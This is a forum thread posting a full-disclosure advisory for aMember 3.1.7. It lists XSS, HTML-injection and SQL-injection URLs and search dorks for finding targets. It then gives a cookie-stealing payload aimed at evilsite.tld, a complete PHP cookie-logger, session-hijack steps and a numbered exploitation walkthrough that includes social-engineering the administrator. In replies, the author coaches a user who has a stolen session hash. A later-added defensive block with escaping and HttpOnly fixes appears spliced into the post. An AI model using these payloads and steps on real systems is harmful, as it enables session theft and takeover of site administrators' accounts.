Page 1 of 2 (Results 1 to 10 of 12)

Thread: AMember 3.1.7 - Multiple Vulnerabilities

  1. #1: MaXe, Founder of InterN0T (Denmark; joined Jun 2008; 4,140 posts; 41 blog entries; reputation 270; rep power 10)

    AMember 3.1.7 - Multiple Vulnerabilities

    AMember - Multiple Vulnerabilities

    Version Affected: 3.1.7 (Apr-10-2009) (newest)

    Info: aMember is a flexible membership and subscription management PHP script. It has support for
    PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
    Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
    allows you to setup paid-membership areas on your site. It can also be used without any payment
    system - you can manage users manually.

    aMember Pro also supports integration plugins to link users database with third-party scripts,
    for example vBulletin, Joomla, WordPress (see list of integration plugins).
    aMember is a perfect membership software for selling digital subscriptions and downloads.

    Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.

    Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)

    Accurate Googled0rk: (fewer results)
    http://lmgtfy.com/?q=inurl%3A%2Famem...T%2C+2002-2006

    Inaccurate Googled0rk: (more results)
    http://lmgtfy.com/?q=intext%3A%A9+CG...T%2C+2002-2006

    External Links:
    http://www.amember.com/
    http://www.amember.com/p/Main/Download
    http://www.amember.com/p/Main/Demo


    The Advisory
    Version Information:
    http://www.website.tld/amember/docs/changelog.txt

    Information Disclosure:
    http://www.website.tld/amember/docs/tester.php
    http://www.website.tld/amember/setup.php?step='
    http://www.website.tld/amember/admin/report.php?report=' (admin only)
    - More files are affected. (discloses full path to the file)

    Cross Site Scripting (admin only - might not survive a login screen!)
    http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
    http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
    http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
    http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
    http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
    http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
    http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
    http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
    http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
    http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
    http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
    http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
    http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
    http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
    - More files might be affected.

    HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
    http://www.website.tld/amember/signup.php (first- and last-name)
    http://www.website.tld/amember/aff_signup.php (first- and last-name)
    http://www.website.tld/amember/profile.php (first- and last-name)

    HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
    http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)

    Affected Sites (by HTML Injection):
    http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
    http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
    http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
    http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
    http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
    http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
    http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
    -- More files might be affected.

    SQL Injection: (requires admin access)
    http://www.website.tld/amember/admin/access_log.php?order1='a.time+DESC&order2='a.time+DESC
    http://www.website.tld/amember/admin/aff_clicks.php?year_month='&action=aff_sales
    http://www.website.tld/amember/admin/products.php?action=delete&product_id='
    -- More files might be affected, the depth of SQL Injection was not checked!
    Solution
    All the files are encrypted according to CGI Systems' website.
    Questions and answers

    I've downloaded aMember, but the source code is corrupted. How can I download it again ?
    The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology.
    Which essentially means I was unable to find any solution to the problem.
    I believe this vulnerability might be exploited in the wild because it is very
    easy to find and take advantage of (if you know what you're looking for).

    Ways of abusing the HTML Injection and XSS
    The following are examples of what you can input as first- and/or last-name:
    "><SCRIPT SRC=//intern0t.net/.j>
    - Works only in FireFox and NetScape 8.1-G (Gecko)

    Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
    partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
    Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
    especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
    valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

    Firstname: "><script src="//intern0t.net/.j
    Lastname: "></script> </
    - Works in FireFox but should work in all browsers.

    Firstname: "><iframe src="http://google.com
    Lastname: "></iframe> </
    - Works in all browsers.

    Firstname: "><iframe src="//intern0t.net
    Lastname: "></iframe> </
    - Should work in all browsers as well. (tested in FireFox)

    The following is an example of how a cookie stealer will work in conjunction with the exploit:
    <script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
    - The reason "browser-hex" is used is that the above would otherwise issue an error and thereby not work.
    -- Reference about url encoding: http://www.blooberry.com/indexdot/ht...rlencoding.htm

    CookieLogger:
    PHP Code:
    <?php
    // Determine the visiting client's IP address, preferring proxy-supplied headers.
    function GetIP()
    {
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
            $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
            $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
            $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
            $ip = $_SERVER['REMOTE_ADDR'];
        else
            $ip = "unknown";
        return($ip);
    }

    // Append one record per request to log.txt; the query string carries the received cookie.
    function logData()
    {
        $ipLog = "log.txt";
        $cookie = $_SERVER['QUERY_STRING'];
        $register_globals = (bool) ini_get('register_globals'); // the posted code had the typo 'register_gobals'
        if ($register_globals) $ip = getenv('REMOTE_ADDR');
        else $ip = GetIP();

        $rem_port    = $_SERVER['REMOTE_PORT'];
        $user_agent  = $_SERVER['HTTP_USER_AGENT'];
        $rqst_method = $_SERVER['REQUEST_METHOD']; // the posted code read the non-existent $_SERVER['METHOD']
        $rem_host    = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';
        $referer     = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
        $date = date("l dS of F Y h:i:s A");
        $log = fopen("$ipLog", "a+");

        // Use <br> as the record separator when the log file itself is .htm/.html.
        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
        else
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
        fclose($log);
    }

    logData();
    // Send the visitor on to an unrelated page once the request has been logged.
    header("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf");
    ?>
    When you have gotten a hash from the admin of the victim site you can issue:
    Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)

    What's the first thing you could do as admin?
    http://www.website.tld/amember/admin/backup.php

    What's the best way to exploit the vulnerability?
    1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)

    2) The file should contain the following:
    HTML Code:
    document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
    3) Sign up and make your first name: (try aff_signup.php to avoid paying!)
    "><script src="//evilsite.tld/.j

    4) Make your last name:
    "></script> </

    5) Make your username:
    aaaaaaaaa

    6) After signing up, go to profile.php and make sure the first- and last-name are correct.

    7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!

    Conclusion
    The vendor was (originally) not contacted because they have encrypted all of
    the files and because I believe in full disclosure and open source!

    The vendor was contacted the 25th May because the vulnerability might be
    exploited more than usual in the wild after public disclosure the 14th May.

    Disclosure Information:
    - Vulnerabilities found at the start of May 2009.
    - Advisory finished and published 14th May on InterN0T.
    - Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.
    - OSVDB, CVE (Mitre) and CGI Systems contacted the 25th May.
    - Bugtraq: http://www.securityfocus.com/bid/35089/info
    - Secunia: http://secunia.com/advisories/35182/

    All of the best,
    MaXe
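
    Added example (not aMember's code and not from the post above): the attribute-context rendering bug the advisory describes, shown beside its fix. A stored first name of "><script>alert(0)</script> closes the value="..." attribute when echoed raw, but is inert once escaped with ENT_QUOTES; the block also shows an allow-list for an ORDER BY parameter like order1 in access_log.php (ORDER BY cannot be a bound parameter) and the HttpOnly cookie flag that keeps document.cookie from reading PHPSESSID. The function names, the column map and the sample row are assumptions.

```php
<?php
// Added example, not aMember's code. Function names, the ORDER BY column map
// and the sample user row are assumptions made for this illustration.

// Escape for HTML body and attribute context. ENT_QUOTES covers the double
// quote the advisory's payload uses to break out of value="...".
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern: a stored name echoed straight into an attribute.
function renderNameFieldVulnerable(array $user): string {
    return '<input name="name_f" value="' . $user['name_f'] . '">';
}

// Hardened pattern: identical markup, escaped on output.
function renderNameFieldFixed(array $user): string {
    return '<input name="name_f" value="' . esc($user['name_f']) . '">';
}

// ORDER BY cannot be bound with a prepared statement, so map the request
// value onto a fixed allow-list instead of concatenating it into the query.
function orderByClause(string $requested): string {
    $allowed = ['time' => 'a.time', 'ip' => 'a.remote_addr', 'url' => 'a.url'];
    [$col, $dir] = array_pad(explode(' ', trim($requested), 2), 2, 'ASC');
    $sqlCol = $allowed[$col] ?? 'a.time';               // unknown column -> default column
    $sqlDir = strtoupper($dir) === 'DESC' ? 'DESC' : 'ASC';
    return "ORDER BY $sqlCol $sqlDir";
}

// Session cookie flags: HttpOnly keeps document.cookie from reading PHPSESSID,
// so an injected script can no longer read the admin's session id. Call before
// session_start(). Requires PHP 7.3+ for the array form of the parameters.
function hardenSessionCookie(bool $https): void {
    session_set_cookie_params(['httponly' => true, 'secure' => $https, 'samesite' => 'Lax']);
    ini_set('session.use_strict_mode', '1');  // reject session ids the server never issued
}

// Constructed sample: the advisory's payload stored as a first name.
$user = ['name_f' => '"><script>alert(0)</script>', 'name_l' => '"></script> </'];

echo renderNameFieldVulnerable($user), "\n";
// <input name="name_f" value=""><script>alert(0)</script>">  (script runs in the admin's browser)
echo renderNameFieldFixed($user), "\n";
// <input name="name_f" value="&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;">  (plain text)
echo orderByClause("'a.time DESC"), "\n";  // ORDER BY a.time DESC  (the quote never reaches SQL)
echo orderByClause("ip desc"), "\n";       // ORDER BY a.remote_addr DESC
```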


  2. #2: MaXe, Founder of InterN0T (Denmark; joined Jun 2008; 4,140 posts; 41 blog entries; reputation 270; rep power 10)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    Updated with the best method to exploit the vulnerability and 1 addition to the cookielogger:
    PHP Code:
    header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); 
    The following script was also added to the thread:
    document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;


  3. #3: (member joined Jun 2009; 1 post; reputation 1; rep power 7)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    I have got the hash but don't know how to use it. Can anyone help me here?
    Sorry, I'm kind of a noob.
    When you have gotten a hash from the admin of the victim site you can issue:
    Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)

  4. #4: MaXe, Founder of InterN0T (Denmark; joined Jun 2008; 4,140 posts; 41 blog entries; reputation 270; rep power 10)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    If I had a hash like 9cdfb439c7876e703e307864c9167a15 (md5 of the word lol),
    then I would enter the following in my browser: (where you normally type in websites)
    javascript:void(document.cookie="PHPSESSID=9cdfb439c7876e703e307864c9167a15")

    Keep in mind that you should have legal access and that neither I nor InterN0T has any
    responsibility for whatever harm or malicious intentions you might have, good day sir ;-)


  5. #5: (member joined Jul 2009; 2 posts; reputation 1; rep power 6)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    Hey guys, I have an aMember 3.1.4 site, though when I go to add the HTML injection it rejects it and prompts me to enter a first name and last name. I have done exactly as stated above; I have even substituted the " character with its HTML equivalent. Should I just convert the entire injected string to HTML and try that, or won't that work?
    Would appreciate the feedback.
    Cheers

  6. #6: (member joined Jul 2009; 2 posts; reputation 1; rep power 6)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    OK, I have managed to get it saved using
    &lt;/script&gt; (obviously not the full code) but equal to "><script>alert(0)</script>
    Once this has been injected, when I go to view the profile should it prompt, or does it only prompt for the admin that browses the users?

  7. #7: MaXe, Founder of InterN0T (Denmark; joined Jun 2008; 4,140 posts; 41 blog entries; reputation 270; rep power 10)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    It should give you an alert box saying 0. The problem is that if you have downloaded the
    newest version then they have already included a security fix for this :-) They made that
    a few weeks ago. Even the site which has version 3.1.4 might have the security fix applied ;-)

    About the html injection, well first you need a vulnerable version and then in the files
    mentioned above, f.ex. signup.php, aff_signup.php or profile.php it was possible to
    inject: "><script>alert(0)</script> which in return would be triggered at certain admin
    panel pages / sites that an administrator would view :-)

    PS: Using &lt; and &gt; won't make the script work, except if you're breaking a bad-character filter that returns it to normal ;-)
    The above was by the way tested with MySQL 4 (I think) and magic_quotes turned on. No big deal about the magic quotes though :-P


  8. #8: NetRolller 3D (joined Jul 2009; 3 posts; reputation 1; rep power 6)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    Quote Originally Posted by MaXe View Post
    Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)
    Anyone mind telling me how my nickname got attached to this exploit? I was not involved in making it, to the best of my knowledge. (I assume it was added by someone on Freenode/#remote-exploit, as I usually use my nickname in the form ".NetRolller 3D", which Freenode normalizes to "NetRolller3D".)

  9. #9: macd3v, Cyber Assassin (joined Oct 2008; 407 posts; reputation 251; rep power 9)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    Quote Originally Posted by NetRolller 3D View Post
    Anyone mind telling me how my nickname got attached to this exploit? I was not involved in making it, to the best of my knowledge. (I assume it was added by someone on Freenode/#remote-exploit, as I usually use my nickname in the form ".NetRolller 3D", which Freenode normalizes to "NetRolller3D".)
    I think it was more of a shout-out to all those people, because it also says all of InterN0T... and obviously all of InterN0T didn't make it either. So there ya go.

  10. #10: MaXe, Founder of InterN0T (Denmark; joined Jun 2008; 4,140 posts; 41 blog entries; reputation 270; rep power 10)

    Re: [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    Quote Originally Posted by NetRolller 3D View Post
    Anyone mind telling me how my nickname got attached to this exploit? I was not involved in making it, to the best of my knowledge. (I assume it was added by someone on Freenode/#remote-exploit, as I usually use my nickname in the form ".NetRolller 3D", which Freenode normalizes to "NetRolller3D".)
    InterN0T is there since I might have used some resources from our community :-)

    The people written there are listed because they have given me help, inspiration or
    examples of how I could use XSS or Javascript the way I wanted to ;-) We talked in
    #remote-exploit on Freenode, so that's why NetRoller :-)

